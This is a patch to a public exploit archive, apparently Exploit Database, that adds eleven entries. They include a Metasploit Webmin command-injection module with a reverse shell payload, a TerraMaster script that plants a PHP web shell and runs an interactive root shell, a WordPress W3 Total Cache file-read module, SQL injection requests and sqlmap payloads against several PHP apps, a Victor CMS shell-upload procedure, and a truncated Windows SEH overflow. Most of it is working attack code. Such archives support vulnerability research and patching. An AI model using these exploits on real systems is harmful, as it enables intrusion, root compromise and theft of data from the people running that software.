From 3aeb1a0d81e462f0af2863eb7f628c88de35eba0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 23 Dec 2020 05:01:59 +0000 Subject: [PATCH] DB: 2020-12-23 12 changes to exploits/shellcodes 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH) Victor CMS 1.0 - File Upload To RCE Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated) CSE Bookstore 1.0 - Multiple SQL Injection Library Management System 3.0 - _Add Category_ Stored XSS Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit) Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit) Artworks Gallery Management System 1.0 - 'id' SQL Injection Faculty Evaluation System 1.0 - Stored XSS TerraMaster TOS 4.2.06 - RCE (Unauthenticated) --- exploits/linux/webapps/49318.rb | 165 ++++++++++++++++++++++++++++++++ exploits/linux/webapps/49321.py | 66 +++++++++++++ exploits/php/webapps/49307.txt | 1 + exploits/php/webapps/49310.txt | 19 ++++ exploits/php/webapps/49312.txt | 82 ++++++++++++++++ exploits/php/webapps/49314.txt | 110 +++++++++++++++++++++ exploits/php/webapps/49315.txt | 20 ++++ exploits/php/webapps/49316.txt | 18 ++++ exploits/php/webapps/49317.rb | 86 +++++++++++++++++ exploits/php/webapps/49319.txt | 64 +++++++++++++ exploits/php/webapps/49320.txt | 19 ++++ exploits/windows/local/49322.py | 78 +++++++++++++++ files_exploits.csv | 11 +++ 13 files changed, 739 insertions(+) create mode 100755 exploits/linux/webapps/49318.rb create mode 100755 exploits/linux/webapps/49321.py create mode 100644 exploits/php/webapps/49310.txt create mode 100644 exploits/php/webapps/49312.txt create mode 100644 exploits/php/webapps/49314.txt create mode 100644 exploits/php/webapps/49315.txt create mode 100644 exploits/php/webapps/49316.txt create mode 100755 exploits/php/webapps/49317.rb create mode 100644 exploits/php/webapps/49319.txt create mode 100644 exploits/php/webapps/49320.txt create mode 100755 exploits/windows/local/49322.py diff --git a/exploits/linux/webapps/49318.rb b/exploits/linux/webapps/49318.rb new file mode 100755 index 000000000..965213565 --- /dev/null +++ b/exploits/linux/webapps/49318.rb @@ -0,0 +1,165 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Webmin 1.962 - Package Update Escape Bypass RCE (Metasploit)', + 'Description' => %q( + This module exploits an arbitrary command execution vulnerability in Webmin + 1.962 and lower versions. Any user authorized to the "Package Updates" + module can execute arbitrary commands with root privileges. + It emerged by circumventing the measure taken for CVE-2019-12840. + s/\\(-)|\\(.)/string/g; escape is not enough for prevention. + Therefore, since the package name variable is placed directly in the system command, + we can manipulate it using some escape characters that HTTP supports. + For example, we can escape control by dropping the command line down one line. + We can do this with "%0A" and "%0C" urlencoded row values.Also, for paylad to work correctly, + we must add double an ampersand(&&) to the end of the payload (%26%26) + ), + 'Author' => [ + 'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', 'CVE-2020-35606'], + ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1962-PU-Escape-Bypass-Remote-Command-Execution.html'] + ], + 'Privileged' => true, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 512, + 'Compat' => + { + 'PayloadType' => 'cmd' + } + }, + 'DefaultOptions' => + { + 'RPORT' => 10000, + 'SSL' => false, + 'PAYLOAD' => 'cmd/unix/reverse_perl' + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [['Webmin <= 1.962', {}]], + 'DisclosureDate' => '2020-12-21', + 'DefaultTarget' => 0) + ) + register_options [ + OptString.new('USERNAME', [true, 'Webmin Username']), + OptString.new('PASSWORD', [true, 'Webmin Password']), + OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/']) + ] + end + + def peer + "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" + end + + def login + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, 'session_login.cgi'), + 'cookie' => 'testing=1', # it must be used for "Error - No cookies" + 'vars_post' => { + 'page' => '', + 'user' => datastore['USERNAME'], + 'pass' => datastore['PASSWORD'] + } + }) + + if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/ + return $1 + end + + return nil unless res + '' + end + + def check + cookie = login + return CheckCode::Detected if cookie == '' + return CheckCode::Unknown if cookie.nil? + + vprint_status('Attempting to execute...') + # check version + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "sysinfo.cgi"), + 'cookie' => "sid=#{cookie}", + 'vars_get' => { "xnavigation" => "1" } + }) + + if res && res.code == 302 && res.body + version = res.body.split("Webmin 1.")[1] + return CheckCode::Detected if version.nil? + version = version.split(" ")[0] + if version <= "962" + # check package update priv + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, "package-updates/"), + 'cookie' => "sid=#{cookie}" + }) + + if res && res.code == 200 && res.body =~ /Software Package Update/ + print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<") + return CheckCode::Vulnerable + end + end + end + print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<") + print_status("Please try with another user account!") + CheckCode::Safe + end + + def exploit + cookie = login + if cookie == '' || cookie.nil? + fail_with(Failure::Unknown, 'Failed to retrieve session cookie') + end + print_good("Session cookie: #{cookie}") + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'), + 'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" }, + 'cookie' => "sid=#{cookie}" + ) + unless res && res.code == 200 + fail_with(Failure::Unknown, 'Request failed') + end + + print_status("Attempting to execute the payload...") + run_update(cookie) + end + + def run_update(cookie) + @b64p = Rex::Text.encode_base64(payload.encoded) + perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"' + payload = Rex::Text.uri_encode(perl_payload) + + res = send_request_cgi( + { + 'method' => 'POST', + 'cookie' => "sid=#{cookie}", + 'ctype' => 'application/x-www-form-urlencoded', + 'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'), + 'headers' => + { + 'Referer' => "#{peer}/package-updates/?xnavigation=1" + }, + # new vector // bypass to backslash %0A%7C{}%26%26 + 'data' => "redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26" + # for CVE-2019-12840 #'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages" + }) + end +end \ No newline at end of file diff --git a/exploits/linux/webapps/49321.py b/exploits/linux/webapps/49321.py new file mode 100755 index 000000000..b62e60274 --- /dev/null +++ b/exploits/linux/webapps/49321.py @@ -0,0 +1,66 @@ +# Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated) +# Date: 12/12/2020 +# Exploit Author: IHTeam +# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ +# Vendor Homepage: https://www.terra-master.com/ +# Version: <= 4.2.06 +# Tested on: 4.1.30, 4.2.06 + +#!/usr/bin/env python3 +import argparse +import requests +import time +import sys +import urllib.parse +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +parser = argparse.ArgumentParser(description="TerraMaster TOS <= 4.2.06 Unauth RCE") +parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8081/") +args = parser.parse_args() + +url = args.url +headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'} +epoch_time = int(time.time()) +shell_filename = "debug"+str(epoch_time)+".php" + +def check_endpoint(url, headers): + response = requests.get(url+'/version', headers=headers, verify=False) + if response.status_code == 200: + print("[+] TerraMaster TOS version: ", str(response.content)) + else: + print("\n[-] TerraMaster TOS response code: ", response.status_code) + sys.exit() + +def upload_shell(url, headers, shell_filename): + payload = "http|echo \"\" >> /usr/www/"+shell_filename+" && chmod +x /usr/www/"+shell_filename+"||" + payload = urllib.parse.quote(payload, safe='') + print("[/] Uploading shell...") + response = requests.get(url+'/include/makecvs.php?Event='+payload, headers=headers, verify=False) + time.sleep(1) + response = requests.get(url+'/'+shell_filename+'?cmd=id', headers=headers, verify=False) + if ('uid=0(root) gid=0(root)' in str(response.content, 'utf-8')): + print("[+] Upload succeeded") + else: + print("\n[-] Error uploading shell: ", response.content) + sys.exit() + +def interactive_shell(url, headers, shell_filename, cmd): + response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(cmd, safe=''), headers=headers, verify=False) + print(str(response.text)+"\n") + + +def delete_shell(url, headers, shell_filename): + delcmd = "rm /usr/www/"+shell_filename + response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(delcmd, safe=''), headers=headers, verify=False) + print("\n[+] Shell deleted") + +check_endpoint(url, headers) +upload_shell(url, headers, shell_filename) +try: + while True: + cmd = input("# ") + interactive_shell(url, headers, shell_filename, cmd) +except: + delete_shell(url, headers, shell_filename) \ No newline at end of file diff --git a/exploits/php/webapps/49307.txt b/exploits/php/webapps/49307.txt index 5c40e7e0c..05ded52b2 100644 --- a/exploits/php/webapps/49307.txt +++ b/exploits/php/webapps/49307.txt @@ -4,6 +4,7 @@ # Vendor: Phpgurukul # Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: 1.0 +# CVE: CVE-2020-35151 I DESCRIPTION ======================================================================== diff --git a/exploits/php/webapps/49310.txt b/exploits/php/webapps/49310.txt new file mode 100644 index 000000000..4166d900e --- /dev/null +++ b/exploits/php/webapps/49310.txt @@ -0,0 +1,19 @@ +# Exploit Title: Victor CMS 1.0 - File Upload To RCE +# Date: 20.12.2020 +# Exploit Author: Mosaaed +# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite +# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip +# Version: 1.0 + +# Tested on: Apache2/Linux + +Step1: register http://localhost/CMSsite-master/register.php +step2: login as user +step3: Go to Profile +step4: upload imag as php file (upload shell.php) +step5: update user +step6: You will find your shell in img folder :/path/img/cmd.php + +http://localhost/CMSsite-master/img/cmd.php?cmd=id + +uid=33(www-data) gid=33(www-data) groups=33(www-data) \ No newline at end of file diff --git a/exploits/php/webapps/49312.txt b/exploits/php/webapps/49312.txt new file mode 100644 index 000000000..877268ee0 --- /dev/null +++ b/exploits/php/webapps/49312.txt @@ -0,0 +1,82 @@ +# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated) +# Date: 12-21-2020 +# Exploit Author: Matthew Aberegg, Alex Prieto +# Vendor Homepage: https://pandorafms.com/ +# Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c +# Software Link: https://pandorafms.com/community/get-started/ +# Version: Pandora FMS 7.0 NG 750 +# Tested on: Ubuntu 18.04 + + +# Vulnerability Details +# Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS. +# Vulnerable Parameter : network_csv + + +# POC + +POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119 +Content-Length: 1597 +Origin: http://TARGET +Connection: close +Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan +Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3 +Upgrade-Insecure-Requests: 1 + +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="interval_manual_defined" + +1 +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="interval_select" + +300 +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="interval_text" + +0 +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="interval" + +0 +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="interval_units" + +1 +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="taskname" + +test +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="id_recon_server" + +3 +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="network_csv_enabled" + +on +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="network_csv"; filename="test.txt" +Content-Type: text/plain + +' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a + +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="network" + + +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="comment" + +test +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="submit" + +Next +-----------------------------308827614039434535382911921119-- \ No newline at end of file diff --git a/exploits/php/webapps/49314.txt b/exploits/php/webapps/49314.txt new file mode 100644 index 000000000..277304140 --- /dev/null +++ b/exploits/php/webapps/49314.txt @@ -0,0 +1,110 @@ +# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection +# Date : 2020-12-21 +# Author : Musyoka Ian +# Version : CSE Bookstore 1.0 +# Vendor Homepage: https://projectworlds.in/ +# Platform : PHP +# Tested on : Debian + +CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database the web appliction is running on + +Below is results returned by SQLMap + +Type: boolean-based blind +Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) +Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138# Type: error-based +Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF + +Type: time-based blind +Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT + + +POC 1 + +REQUEST +======== +GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1 +Host: 192.168.196.83 +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n +Upgrade-Insecure-Requests: 1 + +RESPONSE +======== + +HTTP/1.1 200 OK +Date: Mon, 21 Dec 2020 20:09:49 GMT +Server: Apache/2.4.38 (Debian) +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Vary: Accept-Encoding +Content-Length: 172 +Connection: close +Content-Type: text/html; charset=UTF-8 + +Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1 + +POC 2 +Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter + +REQUEST +======= + +POST /ebook/cart.php HTTP/1.1 +Host: 192.168.196.83 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4 +Content-Type: application/x-www-form-urlencoded +Content-Length: 57 +Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9 + + +bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart + +RESPONSE +======= +get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1 + +POC 3. +Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials + +REQUEST +======= +GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1 +Host: 192.168.196.83 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Referer: http://192.168.196.83/ebook/books.php +Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on + +RESPONSE +======== +HTTP/1.1 200 OK +Date: Mon, 21 Dec 2020 20:47:58 GMT +Server: Apache/2.4.38 (Debian) +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Vary: Accept-Encoding +Content-Length: 188 +Connection: close +Content-Type: text/html; charset=UTF-8 + +Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1 \ No newline at end of file diff --git a/exploits/php/webapps/49315.txt b/exploits/php/webapps/49315.txt new file mode 100644 index 000000000..8a0b431b1 --- /dev/null +++ b/exploits/php/webapps/49315.txt @@ -0,0 +1,20 @@ +# Exploit Title: Library Management System 3.0 - "Add Category" Stored XSS +# Exploit Author: Kislay Kumar +# Date: 2020-12-22 +# Google Dork: N/A +# Vendor Homepage: https://otsglobal.org/ +# Software Link: https://codecanyon.net/item/library-management-system-22/16965307 +# Affected Version: 3.0 +# Patched Version: Unpatched +# Category: Web Application +# Tested on: Kali Linux + +Step 1. Login as Admin. + +Step 2. Select "Book" from menu and select "Categories" from sub menu and +after that click on "Add Category". + +Step 3. Insert payload - "> in "Category Name" + +Step 4. Now Click on "Save" , Go to "Category" and See last , there you +will get alert box. \ No newline at end of file diff --git a/exploits/php/webapps/49316.txt b/exploits/php/webapps/49316.txt new file mode 100644 index 000000000..aecb5eb78 --- /dev/null +++ b/exploits/php/webapps/49316.txt @@ -0,0 +1,18 @@ +# Exploit Title: Multi Branch School Management System 3.5 - "Create Branch" Stored XSS +# Exploit Author: Kislay Kumar +# Date: 2020-12-21 +# Google Dork: N/A +# Vendor Homepage: https://www.ramomcoder.com/ +# Software Link: https://codecanyon.net/item/ramom-multi-branch-school-management-system/25182324 +# Affected Version: 3.5 +# Category: Web Application +# Tested on: Kali Linux + +Step 1. Login as Super Admin. + +Step 2. Select "Branch" from menu and after that click on "Create Branch". + +Step 3. Insert payload - "> in "Branch Name" , +"School Name" , "Mobile No." , "Currency" , "Symbol" , "City" and "State". + +Step 4. Now Click on "Save" and you will get a list of alert boxes. \ No newline at end of file diff --git a/exploits/php/webapps/49317.rb b/exploits/php/webapps/49317.rb new file mode 100755 index 000000000..75153361d --- /dev/null +++ b/exploits/php/webapps/49317.rb @@ -0,0 +1,86 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +# +## + +class MetasploitModule < Msf::Auxiliary +include Msf::Auxiliary::Report +include Msf::Exploit::Remote::HTTP::Wordpress +include Msf::Auxiliary::Scanner + +def initialize(info = {}) +super( +update_info( +info, +'Name' => 'WordPress W3 Total Cache File Read Vulnerability', +'Description' => %q{ +This module exploits an unauthenticated directory traversal vulnerability +in WordPress plugin +'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with +the web server privileges. +}, +'References' => +[ +['CVE', '2019-6715'], +['WPVDB', '9248'], +['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'], +['URL','https://vinhjaxt.github.io/2019/03/cve-2019-6715'], +], +'Author' => +[ +'VinhJAXT', # Vulnerability discovery +'Hoa Nguyen - SunCSR Team' # Metasploit module +], +'DisclosureDate' => '2014-09-20', +'License' => MSF_LICENSE +) +) + +register_options( +[ +OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), +OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 2]) +] +) +end + +def check +check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26') +end + +def run_host(ip) +traversal = '../' * datastore['DEPTH'] +filename = datastore['FILEPATH'] +filename = filename[1, filename.length] if filename =~ %r{^/} + +json_body = { 'Type' => "SubscriptionConfirmation", +'Message' => '', +'SubscribeURL' => "file:///#{traversal}#{filename}" +} + +res = send_request_cgi({ +'method' => 'PUT', +'uri' => normalize_uri(wordpress_url_plugins, 'w3-total-cache', 'pub','sns.php'), +'ctype' => 'application/json', +'data' => JSON.generate(json_body) +}) + +fail_with Failure::Unreachable, 'Connection failed' unless res +fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' unless res.code == 200 +fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? + +print_status('Downloading file...') +print_line("\n#{res.body}\n") + +fname = datastore['FILEPATH'] +path = store_loot( +'w3_total_cache.traversal', +'text/plain', +ip, +res.body, +fname +) +print_good("File saved in: #{path}") +end +end \ No newline at end of file diff --git a/exploits/php/webapps/49319.txt b/exploits/php/webapps/49319.txt new file mode 100644 index 000000000..79534b2ad --- /dev/null +++ b/exploits/php/webapps/49319.txt @@ -0,0 +1,64 @@ +# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection +# Exploit Author: Vijay Sachdeva +# Date: 2020-12-22 +# Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code +# Affected Version: Version 1 +# Tested on Kali Linux + +Step 1. Log in to the application with admin credentials. + +Step 2. Click on "Explore" and then select "Artworks". + +Step 3. Choose any item, the URL should be " + +http://localhost/art-bay/info_art.php?id=6 + +Step 4. Run sqlmap on the URL where the "id" parameter is given + + +sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner + +--- + + +Parameter: id (GET) + + Type: boolean-based blind + + Title: AND boolean-based blind - WHERE or HAVING clause + + Payload: id=8 AND 4531=4531 + + + Type: time-based blind + + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + + Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG) + + + Type: UNION query + + Title: Generic UNION query (NULL) - 9 columns + + Payload: id=8 UNION ALL SELECT +NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)-- +- + +--- + +[08:18:34] [INFO] the back-end DBMS is MySQL + +[08:18:34] [INFO] fetching banner + +back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) + +banner: '10.3.24-MariaDB-2' + + +--- + + +Step 5. Sqlmap should inject the web-app successfully which leads to +information disclosure. \ No newline at end of file diff --git a/exploits/php/webapps/49320.txt b/exploits/php/webapps/49320.txt new file mode 100644 index 000000000..1e5bbafe3 --- /dev/null +++ b/exploits/php/webapps/49320.txt @@ -0,0 +1,19 @@ +# Exploit Title: Faculty Evaluation System 1.0 - Stored XSS +# Exploit Author: Vijay Sachdeva (pwnshell) +# Date: 2020-12-22 +# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14635&title=Faculty+Evaluation+System+using+PHP%2FMySQLi+with+Source+Code +# Tested on Kali Linux + +Step 1: Log in to the application with admin credentials + +Step 2: Click on Questionnaires, then click "Action" for any Academic Year +and then click manage. + +Step 3. Input "" in "Question" field of +the Question form. + +Step 4. Click on "Save" when done and this will trigger the Stored XSS +payloads. Whenever you click on Questionnaires, click action for any +academic year, and then manage, your XSS Payloads will be triggered for +that "Academic Year" \ No newline at end of file diff --git a/exploits/windows/local/49322.py b/exploits/windows/local/49322.py new file mode 100755 index 000000000..a338228d0 --- /dev/null +++ b/exploits/windows/local/49322.py @@ -0,0 +1,78 @@ +# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH) +# Date: 2020-12-22 +# Exploit Author: Florian Gassner +# Vendor Homepage: https://www.10-strike.com/ +# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe +# Version: 9.05 +# Tested on: Windows 10 x64 + +# Computer -> From Text File -> Choose exploit.txt + +import struct + +""" +Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214 +""" + +OFFSET = 214 + +""" +badchars = '\x00\x09\x0a\x0d\x3a\x5c' +""" + +""" +Log data, item 23 + Address=01015AF4 + Message= 0x01015af4 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READWRITE} [NetworkInventoryExplorer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\NetworkInventoryExplorer.exe +""" + +pop_pop_ret = struct.pack("